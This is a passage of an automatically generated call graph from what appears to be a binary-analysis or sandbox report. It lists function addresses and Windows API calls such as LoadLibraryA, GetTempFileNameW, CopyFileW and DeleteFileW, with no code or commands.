calls 94052->94061 94062 e4bcce 48 API calls 94052->94062 94064 e4b9e4 94052->94064 94065 eb3909 94052->94065 94067 e4bb85 48 API calls 94052->94067 94070 e4bdfa 48 API calls 94052->94070 94074 e4c413 59 API calls 94052->94074 94075 e4bc74 48 API calls 94052->94075 94077 e4c6a5 49 API calls 94052->94077 94078 e4c799 94052->94078 94087 e826bc 88 API calls 4 library calls 94053->94087 94086 e826bc 88 API calls 4 library calls 94054->94086 94057 eb3989 94088 e4ba85 48 API calls ___crtGetEnvironmentStringsW 94057->94088 94060 eb3973 94060->94049 94061->94052 94062->94052 94089 e826bc 88 API calls 4 library calls 94064->94089 94066 e46b4a 48 API calls 94065->94066 94068 eb3914 94066->94068 94067->94052 94072 e5f4ea 48 API calls 94068->94072 94071 e4b66c CharUpperBuffW 94070->94071 94071->94052 94072->94054 94073->93792 94074->94052 94075->94052 94076->94049 94077->94052 94079 e4c7b0 94078->94079 94080 eb1f17 94078->94080 94084 e5ee75 48 API calls 94079->94084 94085 e4c7bd ___crtGetEnvironmentStringsW 94079->94085 94081 e46b4a 48 API calls 94080->94081 94082 eb1f21 94081->94082 94083 e5f4ea 48 API calls 94082->94083 94083->94085 94084->94085 94085->94052 94086->94060 94087->94057 94088->94060 94089->94060 94091 e4d654 94090->94091 94099 e4d67e 94090->94099 94092 e4d65b 94091->94092 94096 e4d6c2 94091->94096 94093 e4d6ab 94092->94093 94094 e4d666 94092->94094 94093->94099 94103 e5dce0 53 API calls 94093->94103 94102 e4d9a0 53 API calls __cinit 94094->94102 94096->94093 94104 e5dce0 53 API calls 94096->94104 94099->93817 94100->93817 94101->93806 94102->94099 94103->94099 94104->94093 94105->93847 94106->93845 94107->93855 94109 e54637 94108->94109 94110 e5479f 94108->94110 94111 e54643 94109->94111 94112 eb6e05 94109->94112 94113 e4ce19 48 API calls 94110->94113 94252 e54300 335 API calls ___crtGetEnvironmentStringsW 94111->94252 94115 e9e822 335 API calls 94112->94115 94120 e546e4 Mailbox 94113->94120 94116 eb6e11 94115->94116 94117 e54739 Mailbox 94116->94117 94253 e8cc5c 86 API calls 4 library calls 94116->94253 94117->93847 94119 e54659 94119->94116 94119->94117 94119->94120 94123 e96ff0 335 API calls 94120->94123 94202 e8fa0c 94120->94202 94243 e86524 94120->94243 94246 e44252 94120->94246 94123->94117 94125->93857 94126->93862 95059 e4bd30 94127->95059 94129 e53267 94131 eb907a 94129->94131 94132 e532f8 94129->94132 94189 e53628 94129->94189 95141 e8cc5c 86 API calls 4 library calls 94131->95141 95135 e5c36b 86 API calls 94132->95135 94136 e5c3c3 48 API calls 94187 e534eb Mailbox ___crtGetEnvironmentStringsW 94136->94187 94137 e53313 94137->94187 94137->94189 94193 eb94df 94137->94193 95064 e42b7a 94137->95064 94138 eb91fa 95146 e8cc5c 86 API calls 4 library calls 94138->95146 94142 eb909a 94142->94138 94146 e4d645 53 API calls 94142->94146 94143 eb93c5 94145 e4fe30 335 API calls 94143->94145 94144 eb926d 95150 e8cc5c 86 API calls 4 library calls 94144->95150 94148 eb9407 94145->94148 94149 eb910c 94146->94149 94156 e4d6e9 55 API calls 94148->94156 94148->94189 94151 eb9220 94149->94151 94152 eb9114 94149->94152 95147 e41caa 49 API calls 94151->95147 94164 eb9128 94152->94164 94173 eb9152 94152->94173 94154 e533ce 94159 e53465 94154->94159 94160 eb945e 94154->94160 94154->94187 94161 eb9438 94156->94161 94166 e5f4ea 48 API calls 94159->94166 95156 e8c942 50 API calls 94160->95156 95155 e8cc5c 86 API calls 4 library calls 94161->95155 94162 eb923d 94167 eb925e 94162->94167 94168 eb9252 94162->94168 94163 e4fe30 335 API calls 94163->94187 95142 e8cc5c 86 API calls 4 library calls 94164->95142 94176 e5346c 94166->94176 95149 e8cc5c 86 API calls 4 library calls 94167->95149 95148 e8cc5c 86 API calls 4 library calls 94168->95148 94174 eb9177 94173->94174 94178 eb9195 94173->94178 95143 e9f320 335 API calls 94174->95143 94183 e5351f 94176->94183 95071 e4e8d0 94176->95071 94179 eb918b 94178->94179 95144 e9f5ee 335 API calls 94178->95144 94179->94189 95145 e5c2d6 48 API calls ___crtGetEnvironmentStringsW 94179->95145 94181 e5f4ea 48 API calls 94181->94187 94185 e46eed 48 API calls 94183->94185 94186 e53540 94183->94186 94185->94186 94186->94189 94192 eb94b0 94186->94192 94197 e53585 94186->94197 94187->94136 94187->94142 94187->94143 94187->94144 94187->94161 94187->94163 94187->94181 94187->94183 94188 eb9394 94187->94188 94187->94189 95137 e4d9a0 53 API calls __cinit 94187->95137 95138 e4d8c0 53 API calls 94187->95138 95139 e5c2d6 48 API calls ___crtGetEnvironmentStringsW 94187->95139 95151 e9cda2 82 API calls Mailbox 94187->95151 95152 e880e3 53 API calls 94187->95152 95153 e4d764 55 API calls 94187->95153 95154 e4dcae 50 API calls Mailbox 94187->95154 94191 e5f4ea 48 API calls 94188->94191 94198 e53635 Mailbox 94189->94198 95140 e8cc5c 86 API calls 4 library calls 94189->95140 94191->94143 95157 e4dcae 50 API calls Mailbox 94192->95157 94193->94189 95158 e8cc5c 86 API calls 4 library calls 94193->95158 94195 e53615 95136 e4dcae 50 API calls Mailbox 94195->95136 94197->94189 94197->94193 94197->94195 94198->93847 94199->93872 94200->93874 94201->93878 94203 e8fa1c __ftell_nolock 94202->94203 94204 e8fa44 94203->94204 94342 e4d286 48 API calls 94203->94342 94206 e4936c 81 API calls 94204->94206 94207 e8fa5e 94206->94207 94208 e8fb68 94207->94208 94209 e8fa80 94207->94209 94219 e8fb92 94207->94219 94254 e441a9 94208->94254 94211 e4936c 81 API calls 94209->94211 94217 e8fa8c _wcscpy _wcschr 94211->94217 94213 e8fb8e 94214 e4936c 81 API calls 94213->94214 94213->94219 94216 e8fbc7 94214->94216 94215 e441a9 136 API calls 94215->94213 94278 e61dfc 94216->94278 94222 e8fab0 _wcscat _wcscpy 94217->94222 94225 e8fade _wcscat 94217->94225 94219->94117 94220 e4936c 81 API calls 94221 e8fafc _wcscpy 94220->94221 94343 e872cb GetFileAttributesW 94221->94343 94223 e4936c 81 API calls 94222->94223 94223->94225 94225->94220 94226 e8fb1c __wsetenvp 94226->94219 94228 e4936c 81 API calls 94226->94228 94227 e8fbeb _wcscat _wcscpy 94231 e4936c 81 API calls 94227->94231 94229 e8fb48 94228->94229 94344 e860dd 77 API calls 4 library calls 94229->94344 94233 e8fc82 94231->94233 94232 e8fb5c 94232->94219 94281 e8690b 94233->94281 94235 e8fca2 94236 e86524 3 API calls 94235->94236 94237 e8fcb1 94236->94237 94238 e4936c 81 API calls 94237->94238 94241 e8fce2 94237->94241 94239 e8fccb 94238->94239 94287 e8bfa4 94239->94287 94242 e44252 84 API calls 94241->94242 94242->94219 95055 e86ca9 GetFileAttributesW 94243->95055 94247 e44263 94246->94247 94248 e4425c 94246->94248 94250 e44272 94247->94250 94251 e44283 FreeLibrary 94247->94251 94249 e635e4 __fcloseall 83 API calls 94248->94249 94249->94247 94250->94117 94251->94250 94252->94119 94253->94117 94345 e44214 94254->94345 94259 e441d4 LoadLibraryExW 94355 e44291 94259->94355 94260 eb4f73 94262 e44252 84 API calls 94260->94262 94264 eb4f7a 94262->94264 94266 e44291 3 API calls 94264->94266 94268 eb4f82 94266->94268 94267 e441fb 94267->94268 94269 e44207 94267->94269 94381 e444ed 94268->94381 94271 e44252 84 API calls 94269->94271 94273 e4420c 94271->94273 94273->94213 94273->94215 94275 eb4fa9 94389 e44950 94275->94389 94687 e61e46 94278->94687 94282 e86918 _wcschr __ftell_nolock 94281->94282 94283 e61dfc __wsplitpath 47 API calls 94282->94283 94286 e8692e _wcscat _wcscpy 94282->94286 94284 e8695d 94283->94284 94285 e61dfc __wsplitpath 47 API calls 94284->94285 94285->94286 94286->94235 94288 e8bfb1 __ftell_nolock 94287->94288 94289 e5f4ea 48 API calls 94288->94289 94290 e8c00e 94289->94290 94291 e447b7 48 API calls 94290->94291 94292 e8c018 94291->94292 94293 e8bdb4 GetSystemTimeAsFileTime 94292->94293 94294 e8c023 94293->94294 94295 e44517 83 API calls 94294->94295 94296 e8c036 _wcscmp 94295->94296 94297 e8c05a 94296->94297 94298 e8c107 94296->94298 94743 e8c56d 94297->94743 94300 e8c56d 94 API calls 94298->94300 94315 e8c0d3 _wcscat 94300->94315 94302 e61dfc __wsplitpath 47 API calls 94307 e8c088 _wcscat _wcscpy 94302->94307 94303 e444ed 64 API calls 94305 e8c12c 94303->94305 94304 e8c110 94304->94241 94306 e444ed 64 API calls 94305->94306 94308 e8c13c 94306->94308 94310 e61dfc __wsplitpath 47 API calls 94307->94310 94309 e444ed 64 API calls 94308->94309 94311 e8c157 94309->94311 94310->94315 94312 e444ed 64 API calls 94311->94312 94313 e8c167 94312->94313 94314 e444ed 64 API calls 94313->94314 94316 e8c182 94314->94316 94315->94303 94315->94304 94317 e444ed 64 API calls 94316->94317 94318 e8c192 94317->94318 94319 e444ed 64 API calls 94318->94319 94320 e8c1a2 94319->94320 94321 e444ed 64 API calls 94320->94321 94322 e8c1b2 94321->94322 94713 e8c71a GetTempPathW GetTempFileNameW 94322->94713 94324 e8c1be 94325 e63499 117 API calls 94324->94325 94335 e8c1cf 94325->94335 94326 e8c289 94727 e635e4 94326->94727 94328 e8c294 94330 e8c29a DeleteFileW 94328->94330 94331 e8c2ae 94328->94331 94329 e444ed 64 API calls 94329->94335 94330->94304 94332 e8c342 CopyFileW 94331->94332 94337 e8c2b8 94331->94337 94333 e8c358 DeleteFileW 94332->94333 94334 e8c36a DeleteFileW 94332->94334 94333->94304 94740 e8c6d9 CreateFileW 94334->94740 94335->94304 94335->94326 94335->94329 94714 e62aae 94335->94714 94749 e8b965 94337->94749 94341 e8c331 DeleteFileW 94341->94304 94342->94204 94343->94226 94344->94232 94394 e44339 94345->94394 94348 e4423c 94349 e44244 FreeLibrary 94348->94349 94350 e441bb 94348->94350 94349->94350 94352 e63499 94350->94352 94402 e634ae 94352->94402 94354 e441c8 94354->94259 94354->94260 94598 e442e4 94355->94598 94358 e442b8 94359 e442c1 FreeLibrary 94358->94359 94360 e441ec 94358->94360 94359->94360 94362 e44380 94360->94362 94363 e5f4ea 48 API calls 94362->94363 94364 e44395 94363->94364 94606 e447b7 94364->94606 94366 e443a1 ___crtGetEnvironmentStringsW 94367 e443dc 94366->94367 94369 e444d1 94366->94369 94370 e44499 94366->94370 94368 e44950 57 API calls 94367->94368 94377 e443e5 94368->94377 94620 e8c750 93 API calls 94369->94620 94609 e4406b CreateStreamOnHGlobal 94370->94609 94373 e444ed 64 API calls 94373->94377 94375 e44479 94375->94267 94376 eb4ed7 94378 e44517 83 API calls 94376->94378 94377->94373 94377->94375 94377->94376 94615 e44517 94377->94615 94379 eb4eeb 94378->94379 94380 e444ed 64 API calls 94379->94380 94380->94375 94382 eb4fc0 94381->94382 94383 e444ff 94381->94383 94644 e6381e 94383->94644 94386 e8bf5a 94664 e8bdb4 94386->94664 94388 e8bf70 94388->94275 94390 e4495f 94389->94390 94392 eb5002 94389->94392 94669 e63e65 94390->94669 94393 e44967 94398 e4434b 94394->94398 94397 e44321 LoadLibraryA GetProcAddress 94397->94348 94399 e4422f 94398->94399 94400 e44354 LoadLibraryA 94398->94400 94399->94348 94399->94397 94400->94399 94401 e44365 GetProcAddress 94400->94401 94401->94399 94405 e634ba _raise 94402->94405 94403 e634cd 94450 e67c0e 47 API calls __getptd_noexit 94403->94450 94405->94403 94407 e634fe 94405->94407 94406 e634d2 94451 e66e10 8 API calls __wopenfile 94406->94451 94421 e6e4c8 94407->94421 94410 e63503 94411 e6350c 94410->94411 94412 e63519 94410->94412 94452 e67c0e 47 API calls __getptd_noexit 94411->94452 94413 e63543 94412->94413 94414 e63523 94412->94414 94435 e6e5e0 94413->94435 94453 e67c0e 47 API calls __getptd_noexit 94414->94453 94418 e634dd _raise @_EH4_CallFilterFunc@8 94418->94354 94422 e6e4d4 _raise 94421->94422 94455 e67cf4 94422->94455 94424 e6e559 94491 e669d0 47 API calls std::exception::_Copy_str 94424->94491 94425 e6e552 94462 e6e5d7 94425->94462 94428 e6e560 94428->94425 94430 e6e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94428->94430 94429 e6e5cc _raise 94429->94410 94430->94425 94433 e6e4e2 94433->94424 94433->94425 94465 e67d7c 94433->94465 94489 e64e5b 48 API calls __lock 94433->94489 94490 e64ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94433->94490 94443 e6e600 __wopenfile 94435->94443 94436 e6e61a 94503 e67c0e 47 API calls __getptd_noexit 94436->94503 94438 e6e61f 94504 e66e10 8 API calls __wopenfile 94438->94504 94440 e6354e 94454 e63570 LeaveCriticalSection LeaveCriticalSection _fprintf 94440->94454 94441 e6e838 94500 e763c9 94441->94500 94443->94436 94449 e6e7d5 94443->94449 94505 e6185b 59 API calls 3 library calls 94443->94505 94445 e6e7ce 94445->94449 94506 e6185b 59 API calls 3 library calls 94445->94506 94447 e6e7ed 94447->94449 94507 e6185b 59 API calls 3 library calls 94447->94507 94449->94436 94449->94441 94450->94406 94451->94418 94452->94418 94453->94418 94454->94418 94456 e67d05 94455->94456 94457 e67d18 EnterCriticalSection 94455->94457 94458 e67d7c __mtinitlocknum 46 API calls 94456->94458 94457->94433 94459 e67d0b 94458->94459 94459->94457 94492 e6115b 47 API calls 3 library calls 94459->94492 94493 e67e58 LeaveCriticalSection 94462->94493 94464 e6e5de 94464->94429 94466 e67d88 _raise 94465->94466 94467 e67d91 94466->94467 94468 e67da9 94466->94468 94494 e681c2 47 API calls __NMSG_WRITE 94467->94494 94469 e67da7 94468->94469 94475 e67e11 _raise 94468->94475 94469->94468 94497 e669d0 47 API calls std::exception::_Copy_str 94469->94497 94472 e67d96 94495 e6821f 47 API calls 7 library calls 94472->94495 94473 e67dbd 94476 e67dc4 94473->94476 94477 e67dd3 94473->94477 94475->94433 94498 e67c0e 47 API calls __getptd_noexit 94476->94498 94480 e67cf4 __lock 46 API calls 94477->94480 94478 e67d9d 94496 e61145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94478->94496 94483 e67dda 94480->94483 94482 e67dc9 94482->94475 94484 e67dfe 94483->94484 94485 e67de9 InitializeCriticalSectionAndSpinCount 94483->94485 94487 e61c9d _free 46 API calls 94484->94487 94486 e67e04 94485->94486 94499 e67e1a LeaveCriticalSection _doexit 94486->94499 94487->94486 94489->94433 94490->94433 94491->94428 94493->94464 94494->94472 94495->94478 94497->94473 94498->94482 94499->94475 94508 e75bb1 94500->94508 94502 e763e2 94502->94440 94503->94438 94504->94440 94505->94445 94506->94447 94507->94449 94509 e75bbd _raise 94508->94509 94510 e75bcf 94509->94510 94512 e75c06 94509->94512 94595 e67c0e 47 API calls __getptd_noexit 94510->94595 94519 e75c78 94512->94519 94513 e75bd4 94596 e66e10 8 API calls __wopenfile 94513->94596 94516 e75c23 94597 e75c4c LeaveCriticalSection __unlock_fhandle 94516->94597 94518 e75bde _raise 94518->94502 94520 e75c98 94519->94520 94521 e6273b __wsopen_helper 47 API calls 94520->94521 94525 e75cb4 94521->94525 94522 e75deb 94523 e66e20 __invoke_watson 8 API calls 94522->94523 94524 e763c8 94523->94524 94526 e75bb1 __wsopen_helper 104 API calls 94524->94526 94525->94522 94527 e75cee 94525->94527 94533 e75d11 94525->94533 94528 e763e2 94526->94528 94529 e67bda __set_osfhnd 47 API calls 94527->94529 94528->94516 94530 e75cf3 94529->94530 94531 e67c0e ___libm_error_support 47 API calls 94530->94531 94532 e75d00 94531->94532 94535 e66e10 __wopenfile 8 API calls 94532->94535 94534 e75dcf 94533->94534 94541 e75dad 94533->94541 94536 e67bda __set_osfhnd 47 API calls 94534->94536 94537 e75d0a 94535->94537 94538 e75dd4 94536->94538 94537->94516 94539 e67c0e ___libm_error_support 47 API calls 94538->94539 94540 e75de1 94539->94540 94542 e66e10 __wopenfile 8 API calls 94540->94542 94543 e6a979 __wsopen_helper 52 API calls 94541->94543 94542->94522 94544 e75e7b 94543->94544 94545 e75ea6 94544->94545 94546 e75e85 94544->94546 94547 e75b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94545->94547 94548 e67bda __set_osfhnd 47 API calls 94546->94548 94556 e75ec8 94547->94556 94549 e75e8a 94548->94549 94551 e67c0e ___libm_error_support 47 API calls 94549->94551 94550 e75f46 GetFileType 94554 e75f93 94550->94554 94555 e75f51 GetLastError 94550->94555 94553 e75e94 94551->94553 94552 e75f14 GetLastError 94557 e67bed __dosmaperr 47 API calls 94552->94557 94558 e67c0e ___libm_error_support 47 API calls 94553->94558 94565 e6ac0b __set_osfhnd 48 API calls 94554->94565 94559 e67bed __dosmaperr 47 API calls 94555->94559 94556->94550 94556->94552 94561 e75b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94556->94561 94562 e75f39 94557->94562 94558->94537 94560 e75f78 CloseHandle 94559->94560 94560->94562 94563 e75f86 94560->94563 94564 e75f09 94561->94564 94567 e67c0e ___libm_error_support 47 API calls 94562->94567 94566 e67c0e ___libm_error_support 47 API calls 94563->94566 94564->94550 94564->94552 94569 e75fb1 94565->94569 94568 e75f8b 94566->94568 94567->94522 94568->94562 94570 e7616c 94569->94570 94571 e6f82f __lseeki64_nolock 49 API calls 94569->94571 94587 e76032 94569->94587 94570->94522 94572 e7633f CloseHandle 94570->94572 94573 e7601b 94571->94573 94574 e75b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94572->94574 94575 e67bda __set_osfhnd 47 API calls 94573->94575 94592 e7603a 94573->94592 94576 e76366 94574->94576 94575->94587 94577 e761f6 94576->94577 94578 e7636e GetLastError 94576->94578 94577->94522 94579 e67bed __dosmaperr 47 API calls 94578->94579 94580 e7637a 94579->94580 94584 e6ab1e __free_osfhnd 48 API calls 94580->94584 94581 e6ea9c __close_nolock 50 API calls 94581->94592 94582 e6ee0e 59 API calls __filbuf 94582->94592 94583 e6f82f 49 API calls __lseeki64_nolock 94583->94592 94584->94577 94585 e76f40 __chsize_nolock 81 API calls 94585->94592 94586 e6af61 __flswbuf 78 API calls 94586->94587 94587->94570 94587->94586 94589 e6f82f 49 API calls __lseeki64_nolock 94587->94589 94587->94592 94588 e761e9 94591 e6ea9c __close_nolock 50 API calls 94588->94591 94589->94587 94590 e761d2 94590->94570 94593 e761f0 94591->94593 94592->94581 94592->94582 94592->94583 94592->94585 94592->94587 94592->94588 94592->94590 94594 e67c0e ___libm_error_support 47 API calls 94593->94594 94594->94577 94595->94513 94596->94518 94597->94518 94602 e442f6 94598->94602 94601 e442cc LoadLibraryA GetProcAddress 94601->94358 94603 e442aa 94602->94603 94604 e442ff LoadLibraryA 94602->94604 94603->94358 94603->94601 94604->94603 94605 e44310 GetProcAddress 94604->94605 94605->94603 94607 e5f4ea 48 API calls 94606->94607 94608 e447c9 94607->94608 94608->94366 94610 e44085 FindResourceExW 94609->94610 94614 e440a2 94609->94614 94611 eb4f16 LoadResource 94610->94611 94610->94614 94612 eb4f2b SizeofResource 94611->94612 94611->94614 94613 eb4f3f LockResource 94612->94613 94612->94614 94613->94614 94614->94367 94616 e44526 94615->94616 94617 eb4fe0 94615->94617 94621 e63a8d 94616->94621 94619 e44534 94619->94377 94620->94367 94624 e63a99 _raise 94621->94624 94622 e63aa7 94634 e67c0e 47 API calls __getptd_noexit 94622->94634 94624->94622 94625 e63acd 94624->94625 94636 e64e1c 94625->94636 94627 e63aac 94635 e66e10 8 API calls __wopenfile 94627->94635 94631 e63ae2 94643 e63b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94631->94643 94633 e63ab7 _raise 94633->94619 94634->94627 94635->94633 94637 e64e4e EnterCriticalSection 94636->94637 94638 e64e2c 94636->94638 94640 e63ad3 94637->94640 94638->94637 94639 e64e34 94638->94639 94641 e67cf4 __lock 47 API calls 94639->94641 94642 e639fe 81 API calls 3 library calls 94640->94642 94641->94640 94642->94631 94643->94633 94647 e63839 94644->94647 94646 e44510 94646->94386 94648 e63845 _raise 94647->94648 94649 e6385b _memset 94648->94649 94650 e63888 94648->94650 94651 e63880 _raise 94648->94651 94660 e67c0e 47 API calls __getptd_noexit 94649->94660 94652 e64e1c __lock_file 48 API calls 94650->94652 94651->94646 94653 e6388e 94652->94653 94662 e6365b 62 API calls 6 library calls 94653->94662 94656 e63875 94661 e66e10 8 API calls __wopenfile 94656->94661 94657 e638a4 94663 e638c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94657->94663 94660->94656 94661->94651 94662->94657 94663->94651 94667 e6344a GetSystemTimeAsFileTime 94664->94667 94666 e8bdc3 94666->94388 94668 e63478 __aulldiv 94667->94668 94668->94666 94670 e63e71 _raise 94669->94670 94671 e63e94 94670->94671 94672 e63e7f 94670->94672 94673 e64e1c __lock_file 48 API calls 94671->94673 94683 e67c0e 47 API calls __getptd_noexit 94672->94683 94675 e63e9a 94673->94675 94685 e63b0c 55 API calls 4 library calls 94675->94685 94676 e63e84 94684 e66e10 8 API calls __wopenfile 94676->94684 94679 e63ea5 94686 e63ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94679->94686 94680 e63e8f _raise 94680->94393 94682 e63eb7 94682->94680 94683->94676 94684->94680 94685->94679 94686->94682 94688 e61e61 94687->94688 94691 e61e55 94687->94691 94711 e67c0e 47 API calls __getptd_noexit 94688->94711 94690 e62019 94700 e61e41 94690->94700 94712 e66e10 8 API calls __wopenfile 94690->94712 94691->94688 94698 e61ed4 94691->94698 94706 e69d6b 47 API calls 2 library calls 94691->94706 94694 e61fa0 94694->94688 94696 e61fb0 94694->94696 94694->94700 94695 e61f5f 94695->94688 94697 e61f7b 94695->94697 94708 e69d6b 47 API calls 2 library calls 94695->94708 94710 e69d6b 47 API calls 2 library calls 94696->94710 94697->94688 94697->94700 94702 e61f91 94697->94702 94698->94688 94705 e61f41 94698->94705 94707 e69d6b 47 API calls 2 library calls 94698->94707 94700->94227 94709 e69d6b 47 API calls 2 library calls 94702->94709 94705->94694 94705->94695 94706->94698 94707->94705 94708->94697 94709->94700 94710->94700 94711->94690 94712->94700 94713->94324 94715 e62aba _raise 94714->94715 94716 e62ad4 94715->94716 94717 e62aec 94715->94717 94718 e62ae4 _raise 94715->94718 94792 e67c0e 47 API calls __getptd_noexit 94716->94792 94719 e64e1c __lock_file 48 API calls 94717->94719 94718->94335 94721 e62af2 94719->94721 94780 e62957 94721->94780 94722 e62ad9 94793 e66e10 8 API calls __wopenfile 94722->94793 94728 e635f0 _raise 94727->94728 94729 e63604 94728->94729 94730 e6361c 94728->94730 94970 e67c0e 47 API calls __getptd_noexit 94729->94970 94732 e64e1c __lock_file 48 API calls 94730->94732 94736 e63614 _raise 94730->94736 94734 e6362e 94732->94734 94733 e63609 94971 e66e10 8 API calls __wopenfile 94733->94971 94954 e63578 94734->94954 94736->94328 94741 e8c6ff SetFileTime CloseHandle 94740->94741 94742 e8c715 94740->94742 94741->94742 94742->94304 94744 e8c581 __tzset_nolock _wcscmp 94743->94744 94745 e8c05f 94744->94745 94746 e444ed 64 API calls 94744->94746 94747 e8bf5a GetSystemTimeAsFileTime 94744->94747 94748 e44517 83 API calls 94744->94748 94745->94302 94745->94304 94746->94744 94747->94744 94748->94744 94750 e8b97e 94749->94750 94751 e8b970 94749->94751 94753 e8b9c3 94750->94753 94754 e63499 117 API calls 94750->94754 94776 e8b987 94750->94776 94752 e63499 117 API calls 94751->94752 94752->94750 95044 e8bbe8 64 API calls 3 library calls 94753->95044 94756 e8b9a8 94754->94756 94756->94753 94757 e8b9b1 94756->94757 94761 e635e4 __fcloseall 83 API calls 94757->94761 94757->94776 94758 e8ba07 94759 e8ba0b 94758->94759 94760 e8ba2c 94758->94760 94763 e8ba18 94759->94763 94765 e635e4 __fcloseall 83 API calls 94759->94765 95045 e8b7e5 47 API calls std::exception::_Copy_str 94760->95045 94761->94776 94768 e635e4 __fcloseall 83 API calls 94763->94768 94763->94776 94764 e8ba34 94766 e8ba5a 94764->94766 94767 e8ba3a 94764->94767 94765->94763 95046 e8ba8a 90 API calls 94766->95046 94769 e8ba47 94767->94769 94772 e635e4 __fcloseall 83 API calls 94767->94772 94768->94776 94774 e635e4 __fcloseall 83 API calls 94769->94774 94769->94776 94771 e8ba61 95047 e8bb64 94771->95047 94772->94769 94774->94776 94776->94334 94776->94341 94783 e62966 94780->94783 94786 e62984 94780->94786 94781 e62974 94827 e67c0e 47 API calls __getptd_noexit 94781->94827 94783->94781 94783->94786 94790 e6299c ___crtGetEnvironmentStringsW 94783->94790 94784 e62979 94828 e66e10 8 API calls __wopenfile 94784->94828 94794 e62b24 LeaveCriticalSection LeaveCriticalSection _fprintf 94786->94794 94790->94786 94795 e62933 94790->94795 94802 e6af61 94790->94802 94829 e62c84 94790->94829 94835 e68e63 78 API calls 5 library calls 94790->94835 94792->94722 94793->94718 94794->94718 94796 e62952 94795->94796 94797 e6293d 94795->94797 94796->94790 94836 e67c0e 47 API calls __getptd_noexit 94797->94836 94799 e62942 94837 e66e10 8 API calls __wopenfile 94799->94837 94801 e6294d 94801->94790 94803 e6af6d _raise 94802->94803 94804 e6af75 94803->94804 94807 e6af8d 94803->94807 94911 e67bda 47 API calls __getptd_noexit 94804->94911 94805 e6b022 94916 e67bda 47 API calls __getptd_noexit 94805->94916 94807->94805 94811 e6afbf 94807->94811 94809 e6af7a 94912 e67c0e 47 API calls __getptd_noexit 94809->94912 94838 e6a8ed 94811->94838 94812 e6b027 94917 e67c0e 47 API calls __getptd_noexit 94812->94917 94815 e6afc5 94817 e6afeb 94815->94817 94818 e6afd8 94815->94818 94816 e6b02f 94918 e66e10 8 API calls __wopenfile 94816->94918 94913 e67c0e 47 API calls __getptd_noexit 94817->94913 94847 e6b043 94818->94847 94821 e6af82 _raise 94821->94790 94823 e6afe4 94915 e6b01a LeaveCriticalSection __unlock_fhandle 94823->94915 94824 e6aff0 94914 e67bda 47 API calls __getptd_noexit 94824->94914 94827->94784 94828->94786 94830 e62c97 94829->94830 94834 e62cbb 94829->94834 94831 e62933 __ftell_nolock 47 API calls 94830->94831 94830->94834 94832 e62cb4 94831->94832 94833 e6af61 __flswbuf 78 API calls 94832->94833 94833->94834 94834->94790 94835->94790 94836->94799 94837->94801 94839 e6a8f9 _raise 94838->94839 94840 e6a946 EnterCriticalSection 94839->94840 94842 e67cf4 __lock 47 API calls 94839->94842 94841 e6a96c _raise 94840->94841 94841->94815 94843 e6a91d 94842->94843 94844 e6a93a 94843->94844 94845 e6a928 InitializeCriticalSectionAndSpinCount 94843->94845 94919 e6a970 LeaveCriticalSection _doexit 94844->94919 94845->94844 94848 e6b050 __ftell_nolock 94847->94848 94849 e6b0ac 94848->94849 94850 e6b08d 94848->94850 94880 e6b082 94848->94880 94853 e6b105 94849->94853 94854 e6b0e9 94849->94854 94929 e67bda 47 API calls __getptd_noexit 94850->94929 94858 e6b11c 94853->94858 94935 e6f82f 49 API calls 3 library calls 94853->94935 94932 e67bda 47 API calls __getptd_noexit 94854->94932 94856 e6b092 94943 e6a70c 94880->94943 94911->94809 94912->94821 94913->94824 94914->94823 94915->94821 94916->94812 94917->94816 94918->94821 94919->94840 94929->94856 94935->94858 94944 e6a716 IsProcessorFeaturePresent 94943->94944 94945 e6a714 94943->94945 94955 e63587 94954->94955 94956 e6359b 94954->94956 95000 e67c0e 47 API calls __getptd_noexit 94955->95000 94959 e62c84 __flush 78 API calls 94956->94959 94968 e63597 94956->94968 94958 e6358c 95001 e66e10 8 API calls __wopenfile 94958->95001 94961 e635a7 94959->94961 94973 e6eb36 94961->94973 94964 e62933 __ftell_nolock 47 API calls 94965 e635b5 94964->94965 94977 e6e9d2 94965->94977 94967 e635bb 94967->94968 94969 e61c9d _free 47 API calls 94967->94969 94972 e63653 LeaveCriticalSection LeaveCriticalSection _fprintf 94968->94972 94969->94968 94970->94733 94971->94736 94972->94736 94974 e6eb43 94973->94974 94976 e635af 94973->94976 94975 e61c9d _free 47 API calls 94974->94975 94974->94976 94975->94976 94976->94964 94978 e6e9de _raise 94977->94978 94979 e6e9e6 94978->94979 94980 e6e9fe 94978->94980 95017 e67bda 47 API calls __getptd_noexit 94979->95017 94982 e6ea7b 94980->94982 94987 e6ea28 94980->94987 95021 e67bda 47 API calls __getptd_noexit 94982->95021 94983 e6e9eb 95018 e67c0e 47 API calls __getptd_noexit 94983->95018 94986 e6ea80 95022 e67c0e 47 API calls __getptd_noexit 94986->95022 94989 e6a8ed ___lock_fhandle 49 API calls 94987->94989 94990 e6ea2e 94989->94990 94992 e6ea41 94990->94992 94993 e6ea4c 94990->94993 94991 e6ea88 95023 e66e10 8 API calls __wopenfile 94991->95023 95002 e6ea9c 94992->95002 95019 e67c0e 47 API calls __getptd_noexit 94993->95019 94996 e6e9f3 _raise 94996->94967 94998 e6ea47 95000->94958 95001->94968 95024 e6aba4 95002->95024 95017->94983 95018->94996 95019->94998 95021->94986 95022->94991 95023->94996 95044->94758 95045->94764 95046->94771 95048 e8bb77 95047->95048 95049 e8bb71 95047->95049 95051 e61c9d _free 47 API calls 95048->95051 95053 e8bb88 95048->95053 95050 e61c9d _free 47 API calls 95049->95050 95050->95048 95051->95053 95052 e8ba68 95053->95052 95054 e61c9d _free 47 API calls 95053->95054 95054->95052 95056 e86529 95055->95056 95057 e86cc4 FindFirstFileW 95055->95057 95056->94117 95057->95056 95058 e86cd9 FindClose 95057->95058 95058->95056 95060 e4bd3f 95059->95060 95063 e4bd5a 95059->95063 95061 e4bdfa 48 API calls 95060->95061 95062 e4bd47 CharUpperBuffW 95061->95062 95062->95063 95063->94129 95065 eb436a 95064->95065 95066 e42b8b 95064->95066 95067 e5f4ea 48 API calls 95066->95067 95068 e42b92 95067->95068 95069 e42bb3 95068->95069 95159 e42bce 48 API calls 